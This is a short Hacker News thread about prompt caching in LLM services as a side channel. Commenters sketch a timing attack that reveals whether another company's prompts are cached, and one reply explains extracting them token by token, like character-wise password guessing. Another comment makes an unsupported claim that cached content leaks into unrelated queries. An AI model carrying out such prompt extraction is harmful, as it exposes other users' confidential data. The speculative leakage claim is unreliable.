The only thing that comes to mind is some kind of timing attack. Send loads of requests specific to ...

samwho • yesterday at 12:05 PM • 2 replies • view on HN

The only thing that comes to mind is some kind of timing attack. Send loads of requests specific to a company you’re trying to spy on and if it comes back cached you know someone has sent that prompt recently. Expensive attack, though, with a large search space.

Replies

gwern • yesterday at 7:18 PM

No, the search space is tiny: you can just attack 1 BPE at a time! Stuff like password guessing is almost trivial when you get to do a timing attack on each successive character. So that lets you quickly exfiltrate arbitrary numbers of prompts, especially if you have any idea what you are looking for. (Note that a lot of prompts are already public information, or you can already exfiltrate prompts quite easily from services and start attacking from there...)

➕ show 2 replies

gunalx • yesterday at 12:26 PM

I habe come across turning on caching means the llm has a faint memory of what was in the cache, even to unrelated queries. If this is the case its fully unreasonable to share the cache, because of possibility of information leakage.

➕ show 2 replies

alt Hacker News

Replies